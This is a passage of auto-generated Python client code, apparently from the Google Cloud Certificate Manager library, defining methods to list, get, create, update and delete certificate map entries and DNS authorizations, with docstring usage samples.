on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.DeleteCertificateMapRequest):
request = certificate_manager.DeleteCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def list_certificate_map_entries(
self,
request: Union[
certificate_manager.ListCertificateMapEntriesRequest, dict
] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCertificateMapEntriesPager:
r"""Lists CertificateMapEntries in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_certificate_map_entries():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListCertificateMapEntriesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_certificate_map_entries(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListCertificateMapEntriesRequest, dict]):
The request object. Request for the
`ListCertificateMapEntries` method.
parent (str):
Required. The project, location and certificate map from
which the certificate map entries should be listed,
specified in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListCertificateMapEntriesPager:
Response for the ListCertificateMapEntries method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListCertificateMapEntriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.ListCertificateMapEntriesRequest
):
request = certificate_manager.ListCertificateMapEntriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_certificate_map_entries
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCertificateMapEntriesPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_certificate_map_entry(
self,
request: Union[certificate_manager.GetCertificateMapEntryRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.CertificateMapEntry:
r"""Gets details of a single CertificateMapEntry.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetCertificateMapEntryRequest(
name="name_value",
)
# Make the request
response = client.get_certificate_map_entry(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetCertificateMapEntryRequest, dict]):
The request object. Request for the
`GetCertificateMapEntry` method.
name (str):
Required. A name of the certificate map entry to
describe. Must be in the format
``projects/*/locations/*/certificateMaps/*/certificateMapEntries/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.CertificateMapEntry:
Defines a certificate map entry.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetCertificateMapEntryRequest):
request = certificate_manager.GetCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_certificate_map_entry(
self,
request: Union[
certificate_manager.CreateCertificateMapEntryRequest, dict
] = None,
*,
parent: str = None,
certificate_map_entry: certificate_manager.CertificateMapEntry = None,
certificate_map_entry_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new CertificateMapEntry in a given project
and location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
certificate_map_entry = certificate_manager_v1.CertificateMapEntry()
certificate_map_entry.hostname = "hostname_value"
request = certificate_manager_v1.CreateCertificateMapEntryRequest(
parent="parent_value",
certificate_map_entry_id="certificate_map_entry_id_value",
certificate_map_entry=certificate_map_entry,
)
# Make the request
operation = client.create_certificate_map_entry(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateCertificateMapEntryRequest, dict]):
The request object. Request for the
`CreateCertificateMapEntry` method.
parent (str):
Required. The parent resource of the certificate map
entry. Must be in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map_entry (google.cloud.certificate_manager_v1.types.CertificateMapEntry):
Required. A definition of the
certificate map entry to create.
This corresponds to the ``certificate_map_entry`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map_entry_id (str):
Required. A user-provided name of the
certificate map entry.
This corresponds to the ``certificate_map_entry_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMapEntry`
Defines a certificate map entry.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[parent, certificate_map_entry, certificate_map_entry_id]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.CreateCertificateMapEntryRequest
):
request = certificate_manager.CreateCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if certificate_map_entry is not None:
request.certificate_map_entry = certificate_map_entry
if certificate_map_entry_id is not None:
request.certificate_map_entry_id = certificate_map_entry_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMapEntry,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_certificate_map_entry(
self,
request: Union[
certificate_manager.UpdateCertificateMapEntryRequest, dict
] = None,
*,
certificate_map_entry: certificate_manager.CertificateMapEntry = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a CertificateMapEntry.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
certificate_map_entry = certificate_manager_v1.CertificateMapEntry()
certificate_map_entry.hostname = "hostname_value"
request = certificate_manager_v1.UpdateCertificateMapEntryRequest(
certificate_map_entry=certificate_map_entry,
)
# Make the request
operation = client.update_certificate_map_entry(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateCertificateMapEntryRequest, dict]):
The request object. Request for the
`UpdateCertificateMapEntry` method.
certificate_map_entry (google.cloud.certificate_manager_v1.types.CertificateMapEntry):
Required. A definition of the
certificate map entry to update.
This corresponds to the ``certificate_map_entry`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMapEntry`
Defines a certificate map entry.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([certificate_map_entry, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.UpdateCertificateMapEntryRequest
):
request = certificate_manager.UpdateCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if certificate_map_entry is not None:
request.certificate_map_entry = certificate_map_entry
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("certificate_map_entry.name", request.certificate_map_entry.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMapEntry,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_certificate_map_entry(
self,
request: Union[
certificate_manager.DeleteCertificateMapEntryRequest, dict
] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single CertificateMapEntry.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteCertificateMapEntryRequest(
name="name_value",
)
# Make the request
operation = client.delete_certificate_map_entry(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteCertificateMapEntryRequest, dict]):
The request object. Request for the
`DeleteCertificateMapEntry` method.
name (str):
Required. A name of the certificate map entry to delete.
Must be in the format
``projects/*/locations/*/certificateMaps/*/certificateMapEntries/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.DeleteCertificateMapEntryRequest
):
request = certificate_manager.DeleteCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def list_dns_authorizations(
self,
request: Union[certificate_manager.ListDnsAuthorizationsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListDnsAuthorizationsPager:
r"""Lists DnsAuthorizations in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_dns_authorizations():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListDnsAuthorizationsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_dns_authorizations(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListDnsAuthorizationsRequest, dict]):
The request object. Request for the
`ListDnsAuthorizations` method.
parent (str):
Required. The project and location from which the dns
authorizations should be listed, specified in the format
``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListDnsAuthorizationsPager:
Response for the ListDnsAuthorizations method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListDnsAuthorizationsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.ListDnsAuthorizationsRequest):
request = certificate_manager.ListDnsAuthorizationsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_dns_authorizations]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListDnsAuthorizationsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_dns_authorization(
self,
request: Union[certificate_manager.GetDnsAuthorizationRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.DnsAuthorization:
r"""Gets details of a single DnsAuthorization.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetDnsAuthorizationRequest(
name="name_value",
)
# Make the request
response = client.get_dns_authorization(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetDnsAuthorizationRequest, dict]):
The request object. Request for the
`GetDnsAuthorization` method.
name (str):
Required. A name of the dns authorization to describe.
Must be in the format
``projects/*/locations/*/dnsAuthorizations/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.DnsAuthorization:
A DnsAuthorization resource describes
a way to perform domain authorization
for certificate issuance.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetDnsAuthorizationRequest):
request = certificate_manager.GetDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_dns_authorization]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_dns_authorization(
self,
request: Union[certificate_manager.CreateDnsAuthorizationRequest, dict] = None,
*,
parent: str = None,
dns_authorization: certificate_manager.DnsAuthorization = None,
dns_authorization_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new DnsAuthorization in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
dns_authorization = certificate_manager_v1.DnsAuthorization()
dns_authorization.domain = "domain_value"
request = certificate_manager_v1.CreateDnsAuthorizationRequest(
parent="parent_value",
dns_authorization_id="dns_authorization_id_value",
dns_authorization=dns_authorization,
)
# Make the request
operation = client.create_dns_authorization(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateDnsAuthorizationRequest, dict]):
The request object. Request for the
`CreateDnsAuthorization` method.
parent (str):
Required. The parent resource of the dns authorization.
Must be in the format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
dns_authorization (google.cloud.certificate_manager_v1.types.DnsAuthorization):
Required. A definition of the dns
authorization to create.
This corresponds to the ``dns_authorization`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
dns_authorization_id (str):
Required. A user-provided name of the
dns authorization.
This corresponds to the ``dns_authorization_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.certificate_manager_v1.types.DnsAuthorization` A DnsAuthorization resource describes a way to perform domain authorization
for certificate issuance.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, dns_authorization, dns_authorization_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.CreateDnsAuthorizationRequest):
request = certificate_manager.CreateDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if dns_authorization is not None:
request.dns_authorization = dns_authorization
if dns_authorization_id is not None:
request.dns_authorization_id = dns_authorization_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_dns_authorization
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.DnsAuthorization,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_dns_authorization(
self,
request: Union[certificate_manager.UpdateDnsAuthorizationRequest, dict] = None,
*,
dns_authorization: certificate_manager.DnsAuthorization = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a DnsAuthorization.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
dns_authorization = certificate_manager_v1.DnsAuthorization()
dns_authorization.domain = "domain_value"
request = certificate_manager_v1.UpdateDnsAuthorizationRequest(
dns_authorization=dns_authorization,
)
# Make the request
operation = client.update_dns_authorization(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateDnsAuthorizationRequest, dict]):
The request object. Request for the
`UpdateDnsAuthorization` method.
dns_authorization (google.cloud.certificate_manager_v1.types.DnsAuthorization):
Required. A definition of the dns
authorization to update.
This corresponds to the ``dns_authorization`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.certificate_manager_v1.types.DnsAuthorization` A DnsAuthorization resource describes a way to perform domain authorization
for certificate issuance.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([dns_authorization, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.UpdateDnsAuthorizationRequest):
request = certificate_manager.UpdateDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if dns_authorization is not None:
request.dns_authorization = dns_authorization
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_dns_authorization
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("dns_authorization.name", request.dns_authorization.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.DnsAuthorization,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_dns_authorization(
self,
request: Union[certificate_manager.DeleteDnsAuthorizationRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single DnsAuthorization.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteDnsAuthorizationRequest(
name="name_value",
)
# Make the request
operation = client.delete_dns_authorization(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteDnsAuthorizationRequest, dict]):
The request object. Request for the
`DeleteDnsAuthorization` method.
name (str):
Required. A name of the dns authorization to delete.
Must be in the format
``projects/*/locations/*/dnsAuthorizations/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.DeleteDnsAuthorizationRequest):
request = certificate_manager.DeleteDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_dns_authorization
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def __enter__(self):
return self
